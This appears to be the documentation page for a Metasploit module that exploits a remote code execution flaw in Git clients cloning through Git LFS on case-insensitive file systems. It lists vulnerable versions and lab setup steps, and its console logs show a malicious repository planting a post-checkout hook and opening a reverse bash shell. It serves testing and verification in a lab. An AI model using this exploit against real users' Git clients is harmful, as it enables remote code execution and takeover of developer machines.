## Vulnerable Application

Git clients that support delay-capable clean / smudge
filters and symbolic links on case-insensitive file systems are
vulnerable to remote code execution while cloning a repository.

Usage of clean / smudge filters through Git LFS and a
case-insensitive file system changes the checkout order
of repository files which enables the placement of a Git hook
in the `.git/hooks` directory. By default, this module writes
a `post-checkout` script so that the payload will automatically
be executed upon checkout of the repository.

Versions of Git below those in the following list are vulnerable:
              v2.17.6, v2.18.5,
              v2.19.6, v2.20.5,
              v2.21.4, v2.22.5,
              v2.23.4, v2.24.4,
              v2.25.5, v2.26.3,
              v2.27.1, v2.28.1,
              v2.29.3, v2.30.2

### Vulnerable Installation on Windows Setup

1. Download a vulnerable version of Git for Windows: [v2.30.1](https://github.com/git-for-windows/git/releases/download/v2.30.1.windows.1/Git-2.30.1-64-bit.exe)
2. On the `Select Components` section of the installer, make sure Git LFS is selected (should be by default)
3. Keep clicking `next` until reaching the `Configuring extra options` page, select `Enable symbolic links`, `next`, and then `Install`
4. Open Git Bash as Administrator and enter `export MSYS=winsymlinks:nativestrict`
5. You should now be able to run the exploit and get a session on Windows

### Vulnerable Installation on MacOS Setup

1. You can either download a vulnerable version from [here](https://git-scm.com/download/mac) or install via Xcode by typing `git` into the console
2. Install [Homebrew](https://brew.sh/)
3. Install Git LFS via Homebrew: `brew install git-lfs`
4. Setup Git LFS globally: `git lfs install`
5. You should now be able to run the exploit and get a session on MacOS

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/git_lfs_clone_command_exec`
4. Do: `run`
5. You should get a shell.

## Options

### GIT_URI

Sets the Git repository path. Leave empty for randomly-generated path.

## Scenarios

### Git `v2.20.1` on MacOS 10.14.6

```
msf > use exploit/multi/http/git_lfs_clone_command_exec
[*] Using configured payload cmd/unix/reverse_bash
msf exploit(multi/http/git_lfs_clone_command_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf exploit(multi/http/git_lfs_clone_command_exec) > set srvhost 192.168.37.1
srvhost => 192.168.37.1
msf exploit(multi/http/git_lfs_clone_command_exec) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.37.1:4444
msf exploit(multi/http/git_lfs_clone_command_exec) > [*] Using URL: http://192.168.37.1:8080/haCxGmXm0G
[*] Server started.
[*] Git repository to clone: http://192.168.37.1:8080/flowdesk.git
[*] Sending payload data...
[*] Sending LFS object...
[+] Deleted .gitattributes
[+] Deleted vnmzvmgyddk
[+] Deleted .git
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.132:49433) at 2021-07-12 11:35:47 -0500

msf exploit(multi/http/git_lfs_clone_command_exec) > sessions -i -1
[*] Starting interaction with 1...

uname -a
Darwin spaces-Mac.local 18.7.0 Darwin Kernel Version 18.7.0: Tue Aug 20 16:57:14 PDT 2019; root:xnu-4903.271.2~2/RELEASE_X86_64 x86_64
whoami
space
```

### Git `v2.29.0` on Windows 10

```
msf > use exploit/multi/http/git_lfs_clone_command_exec
[*] Using configured payload cmd/unix/reverse_bash
msf exploit(multi/http/git_lfs_clone_command_exec) > set srvhost 192.168.37.1
srvhost => 192.168.37.1
msf exploit(multi/http/git_lfs_clone_command_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf exploit(multi/http/git_lfs_clone_command_exec) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.37.1:4444
msf exploit(multi/http/git_lfs_clone_command_exec) > [*] Using URL: http://192.168.37.1:8080/dA49tJWzH5Ye
[*] Server started.
[*] Git repository to clone: http://192.168.37.1:8080/otcom.git
[*] Sending payload data...
[*] Sending LFS object...
[+] Deleted .gitattributes
[+] Deleted nllefutt
[+] Deleted .git
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.1:61621) at 2021-07-12 11:32:30 -0500

msf exploit(multi/http/git_lfs_clone_command_exec) > sessions -i -1
[*] Starting interaction with 1...

uname -a
MINGW64_NT-10.0-19043 DESKTOP-2U9S1AD 3.1.7-340.x86_64 2020-09-22 19:03 UTC x86_64 Msys
```
